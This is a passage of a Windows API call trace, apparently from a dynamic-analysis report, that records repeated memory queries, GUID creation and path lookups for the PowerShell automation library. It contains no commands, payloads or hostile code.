	[0111.738] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.739] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.739] VirtualQuery (in: lpAddress=0xcb660, lpBuffer=0xcc520, dwLength=0x30 | out: lpBuffer=0xcc520*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.739] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.740] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.740] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.741] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.741] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x551db745, Data2=0xc68f, Data3=0x49ec, Data4=([0]=0x82, [1]=0x97, [2]=0x36, [3]=0x9b, [4]=0xaf, [5]=0x92, [6]=0x9a, [7]=0xce))) returned 0x0
	[0111.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbda0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbcf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.744] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.745] VirtualQuery (in: lpAddress=0xcba30, lpBuffer=0xcc8f0, dwLength=0x30 | out: lpBuffer=0xcc8f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.746] VirtualQuery (in: lpAddress=0xcba30, lpBuffer=0xcc8f0, dwLength=0x30 | out: lpBuffer=0xcc8f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.746] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc470, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.746] VirtualQuery (in: lpAddress=0xcba30, lpBuffer=0xcc8f0, dwLength=0x30 | out: lpBuffer=0xcc8f0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.747] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.747] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.749] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.749] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.749] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.749] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.750] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.750] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.750] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.750] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.751] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.751] VirtualQuery (in: lpAddress=0xcb660, lpBuffer=0xcc520, dwLength=0x30 | out: lpBuffer=0xcc520*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.751] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.751] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.752] VirtualQuery (in: lpAddress=0xcb990, lpBuffer=0xcc850, dwLength=0x30 | out: lpBuffer=0xcc850*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.752] VirtualQuery (in: lpAddress=0xcba20, lpBuffer=0xcc8e0, dwLength=0x30 | out: lpBuffer=0xcc8e0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0111.752] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0x1eb8bc7, Data2=0xa26c, Data3=0x4e5d, Data4=([0]=0xbd, [1]=0xcb, [2]=0x4c, [3]=0xf1, [4]=0x81, [5]=0xf8, [6]=0x96, [7]=0x36))) returned 0x0
	[0111.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.753] CoCreateGuid (in: pguid=0xcd210 | out: pguid=0xcd210*(Data1=0xaa9e4de, Data2=0xb954, Data3=0x491d, Data4=([0]=0x90, [1]=0x5f, [2]=0x7a, [3]=0xf4, [4]=0x38, [5]=0x7f, [6]=0x98, [7]=0x49))) returned 0x0
	[0111.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0111.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc240, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
